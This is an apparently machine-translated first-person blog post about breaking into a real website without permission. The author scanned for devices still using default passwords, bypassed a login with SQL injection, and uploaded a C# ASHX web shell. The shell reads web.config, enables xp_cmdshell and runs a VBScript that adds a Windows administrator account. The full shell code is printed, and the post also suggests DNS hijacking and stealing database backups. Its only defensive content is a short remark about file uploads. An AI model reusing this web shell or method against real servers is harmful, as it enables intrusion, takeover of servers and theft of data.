The first thing I want to say is that it is not the language of the written program is not safe, but to see how the person writing the code to write this program
Some days ago, I went to the client's research, found that the customer's monitoring system is the Sea Conway Video recorder, and then the default username is the Amdin password is 12345, come back to play a game to see how many people use the default password, so wrote a scanning program, quickly scanned a large number of web sites, Also get a lot of use is the default username and password.
Play a two days later found nothing fun, just look for a scan in the record, see some background landing address, so they are tested, and then found this site:
In the beginning, I was testing the weak password,
Admin Amdin etc, random test a few, did not succeed, so began to test the injection of SQL, user name Input 1 ' or 1=1--password casually lost a 1 landing, incredibly landed success ....
But found that the log in after the error, and think of the next may be the user name of the problem, so look for the page to see if I login to the user name, and finally found a written message inside saw
Of course, if the invasion only to this you will be absolutely weak burst ... In fact, of course, because I took his data and program ... Of course, it is best to take his server, that his server is to do the port mapping, and then took his router, and then did not continue to go down, of course, can continue, such as the router's DNS hijacking, page redirection, port mirroring and so on
Next I start to introduce the main intrusion page, File upload page
I wrote a ashx page and uploaded
The code is very simple, is read the site's Web.config file and then output in text form,
Let me start with a simple intrusion process:
1, read web.config get database connection
2. Use SQL Server Execution command to add Windows users (because the Web site is IIS user by default, no permissions are related to line net, etc., but SQL Server is running based on local service with high permissions)
I posted the ashx file code I uploaded:
- <%@ WebHandler language= "C #" class= "Textld"%>
- Using System;
- Using System.Collections.Generic;
- Using System.Linq;
- Using System.Web;
- Using System.Data.SqlClient;
- public class Textld:ihttphandler
- {
- public void Createlocaluser (string newpath)
- {
- System.Diagnostics.Process.Start (@ "D:\1.vbs");
- System.IO.File.WriteAllText (@ "D:\1.vbs", "Set Wsnetwork=createobject (\" WSCRIPT). Network\ ") \ r \ n os=\" winnt://\ "&wsnetwork. ComputerName \ r \ n set ob=getobject (OS) \r\nset oe=getobject (os&\ "/administrators,group\") ' property, admin group \r\nod=ob. Create (\ "User\", \ "test\") ' Establish user \r\nsetpassword \ 1234\ ' Set password \r\nsetinfo\r\nof=getobject (os&\ "/test\", user) \ r \ n Add os&\ "/test\");
- }
- public void Showwebconfig (HttpContext context)
- {
- Context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"));
- }
- public void Writevbs (HttpContext context)
- {
- System.IO.File.WriteAllText (context. Request.mappath ("~/1.vbs"), "set Wsnetwork=createobject (\" WSCRIPT. Network\ ") \ r \ n os=\" winnt://\ "&wsnetwork. ComputerName \ r \ n set ob=getobject (OS) \r\nset oe=getobject (os&\ "/administrators,group\") ' property, admin group \r\nod=ob. Create (\ "User\", \ "test\") ' Establish user \r\nsetpassword \ 1234\ ' Set password \r\nsetinfo\r\nof=getobject (os&\ "/test\", user) \ r \ n Add os&\ "/test\");
- }
- public void ExecuteSQL (string connection, String sql)
- {
- using (SqlConnection con = new SqlConnection (Connection))
- {
- using (SqlCommand COMMD = new SqlCommand (sql, con))
- {
- Con. Open ();
- Commd. ExecuteNonQuery ();
- Con. Close ();
- }
- }
- }
- public void ProcessRequest (HttpContext context)
- {
- Context. Response.ContentType = "Text/plain";
- Context. Response.Write (System.IO.File.ReadAllText) (context. Request.mappath ("~/web.config"));
- Try
- {
- var connection = context. request.querystring["Connection"];
- Switch (context. Request.querystring["Method"])
- {
- Case "1": writevbs (context); Break
- Case "2":
- ExecuteSQL (connection,@ "sp_configure ' show advanced options ', 1 reconfigure");
- ExecuteSQL (connection,@ "sp_configure ' xp_cmdshell ', 1 reconfigure");//Open Database xp_cmdshell
- Break
- Case "3": ExecuteSQL (Connection, "exec master.") xp_cmdshell ' cscript ' + context. Request.mappath ("~/1.vbs") + "'");
- Break
- Default
- Showwebconfig (context);
- Break
- }
- }
- catch (Exception ex)
- {
- Context. Response.Write (ex. message);
- }
- Context. Response.End ();
- }
- public bool IsReusable
- {
- Get
- {
- return false;
- }
- }
- }
And then one execution, so the server was taken down by me ... A Super Admin user named Test password 1234 was created, so the remote connection was tested
And then do what, as we all know ....
Of course, if you do not take down the server, you think you can line your own code to write ... What bad things can't be done ... Of course I just tested the feasibility, even if not to take the server, execute SQL statements to download his database backup is not minutes of things?
Well, let me conclude this invasion, the main Loudi is actually not his SQL injection (personally feel, of course, he is the fuse), but the file upload, most programmers in the file upload function, before the client uploaded files saved to the Site directory under a folder, do not do any processing, This is the main entrance that led to his server being taken down by me.
So I would like to advise you, do file upload or file processing is better, specifically how to deal with I want to smart you must have a lot of methods ...
Primary school culture I can't afford to hurt Ah .... Hey... Forgive me for not being a good writer. You'll see-.-!